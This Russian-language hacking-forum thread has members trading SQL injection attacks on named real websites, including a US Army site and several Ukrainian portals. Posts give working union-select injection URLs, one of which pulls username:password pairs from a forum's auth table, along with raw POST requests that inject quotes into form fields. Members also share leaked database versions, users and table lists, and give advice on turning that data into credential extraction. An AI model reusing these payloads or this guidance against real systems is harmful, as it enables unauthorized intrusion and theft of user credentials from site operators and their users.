Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ~Taxa~

    ~Taxa~ New Member

    Joined:
    24 Jan 2008
    Messages:
    19
    Likes Received:
    4
    Reputations:
    -1
    ну ладно на админов забъем... А что насчет таблицы users ...
    jokester спасибо щас попробуем...
     
  2. ~Taxa~

    ~Taxa~ New Member

    Joined:
    24 Jan 2008
    Messages:
    19
    Likes Received:
    4
    Reputations:
    -1
    jokester
    короче сделал так:
    www.site.ru/index.php?id=-1,2,char(105, 109),4,5+from+users/*
    то мне выводит IM хотя я сам защифровал это слово в char
    AES_DECRYPT не помогает ( что можно еще сделать*?
     
  3. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    ~Taxa~, скинь ссылку сюда или мне в пм (если стесняешься:d), а то я чуствую тебе щас тут насоветуют.
     
  4. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 ~Taxa~
    Slip прав без ссылки трудно советовать если отправишь ему отпишите что было,а то я переживаю
     
  5. tusman

    tusman Elder - Старейшина

    Joined:
    2 Jun 2007
    Messages:
    6
    Likes Received:
    26
    Reputations:
    -26
    Народ подскажите плиз что даёт к примеру это -http://www4.army.mil/otf/story.php?id=-56/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*


    4.1.22-log
    otf_web_user@localhost
    otf

    интересует зачем пишут вот это -
    4.1.22-log
    otf_web_user@localhost
    otf
    и как это можно использавать ?
    Спасибо !
     
  6. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    1. Версия. Если >5 , то хэк упрощается системной информацией о структуре бд.
    2. Пользователь. От какого пользователя в данный момент работает бд. Так же помогает вытягивать информацию из mysq.user с помощью "where".
    3. Название БД (насколько я понял своим телепатизмом). Опять же если ветка >5, упрощает взлом. Так же используется с "where".
     
  7. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    подскажите пожалуйста!
    Нашел скулю
    http://www.poetryclub.com.ua/getpoem.php?id=55117+order+by+5/*
    но при попытке подбора количества полей выплевывает
    ------------------------
    Database error: Invalid SQL: UPDATE `users_poems` SET visited2 = visited2 + 1 WHERE id = 55117 order by 5/* AND confirmed=1
    MySQL Error: 1054 (Unknown column '5' in 'order clause')
    Session halted.
    -----------------------
    пробовал уже и union select(дошел до 30)и order by везде одно и тоже :(
    Подскажите что я делаю не так. заренее Спасибо
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 samarin
    Не все так просто почитай это:
    _http://forum.antichat.ru/threadnav35207-1-10.html
     
  9. xaker-boss

    xaker-boss Elder - Старейшина

    Joined:
    6 Mar 2007
    Messages:
    251
    Likes Received:
    49
    Reputations:
    -11
    Люди а вы неподскажите, где можна найти статью где описывается где вообще в апаче лежат всякие конфиги, например к phpMyAdmin, webmail, squirrelmail и тд. ?
     
  10. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    Апач конфиг в папке :
    \usr\local\Apache\conf файл httpd.conf

    phpMyadmin:
    \home\localhost\admin\mysql\phpmyadmin\
    config.inc.php

    mysql:
    \usr\local\mysql5\my.ini
     
    #1050 neon_fx, 25 Feb 2008
    Last edited: 25 Feb 2008
    1 person likes this.
  11. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    xaker-boss сдесь ещё парочка :)
    _http://forum.antichat.ru/printthread.php?t=49775
     
  12. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    55
    Likes Received:
    8
    Reputations:
    0
    то что первые хеши мускула 5 а следующие 4 я догадывался, но как они могут находиться в одной базе?
     
  13. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    да легко, просто используются разные функции для хеширования
    а точнее password() и old_password()
     
    #1053 Scipio, 25 Feb 2008
    Last edited: 25 Feb 2008
  14. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Добрый вечер!
    нашел скулю вида:
    -----------------------
    http://art.dn.ua/news_one.php?news_id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
    -----------------------
    citysite
    4.0.16
    [email protected]
    ------------------------
    но никак не могу подобрать названия таблиц. Кому не трудно подскажите. Всем откликнувшимся СПАСИБО!
     
  15. none222

    none222 Guest

    Reputations:
    0
    а мот там 1 таблица...
     
  16. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    55
    Likes Received:
    8
    Reputations:
    0
    Как я понимаю версия должна быть 5. А у меня 4.
     
  17. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    да нет, это просто названия типов mysql и mysql5... mysql5 хеши поддерживаются начиная с mysql 4.1 если хочешь работать со старыми хешами (mysql) то мускульный демон надо запускать с параметром --old-passwords, при этом mysql5 хеши как понимаешь никуда не деваются, а остаются в mysql.user
     
    1 person likes this.
  18. wol4ara2

    wol4ara2 New Member

    Joined:
    6 Feb 2008
    Messages:
    4
    Likes Received:
    4
    Reputations:
    -10
    http://fifa08.in/?site=1'
    http://fifa08.in/index.php?site=1'
    http://fifa08.in/printview.php?board=3&topic=1'
    http://fifa08.in/index.php?site=gallery&picID=1'
    http://fifa08.in/index.php?site=forum_topic&topic=1'&page=1&sort=&type=DESC

    POST'om
    POST /comments.php HTTP/1.1
    Host: fifa08.in
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 98

    name=1&mail=1&url=1&captcha=1&captcha_hash='&referer=1&parentID=1&type=1&ip=1&savevisitorcomment=1


    POST /index.php?site=register HTTP/1.1
    Host: fifa08.in
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 74

    nickname=1&username=1&pwd1=1&pwd2=1&mail=1&captcha=1&captcha_hash='&save=1

    Скажите как вытянуть отсюда что-нибудь!!!!???
     
  19. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    чет непашет твой сайтец
    или у меня чет невыходит
     
  20. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Только учусь!
    ------------------------------
    нашел скулю
    ------------------------------
    http://donetsk.life.dn.ua/
    Комунальный портал города Донецка.
    -------------------------------
    5.0.37-log
    life
    life@localhost
    -------------------------------
    http://donetsk.life.dn.ua/nb/view.php?id=-5995/**/union/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10/**/from/**/forums_auth/**/limit/**/1,1/*
    -------------------------------
    есть интересные таблицы: (но я их не перебирал)
    board_admin_comment
    f1
    f1_bodies
    f2
    f2_bodies
    f3
    f3_bodies
    f4
    f4_bodies
    f5
    f5_bodies
    forums
    forums_auth
    forums_forum2group
    forums_groups
    forums_moderators
    forums_user2group
    gal_user
    guide
    mail_archieve
    maillist
    maillist_users
    poll_poll
    poll_vote
    prob
    ---------------------
    сколько ни пробовал не получается делать запросы ттипа:
    from+information_schema.columns+where+teble_name='user'(в этом случае 'forums_auth')+limit,1,1/*
    приходится перебирать ручками :(
    ПОДСКАЖИТЕ может что не так делаю?
     
Thread Status:
Not open for further replies.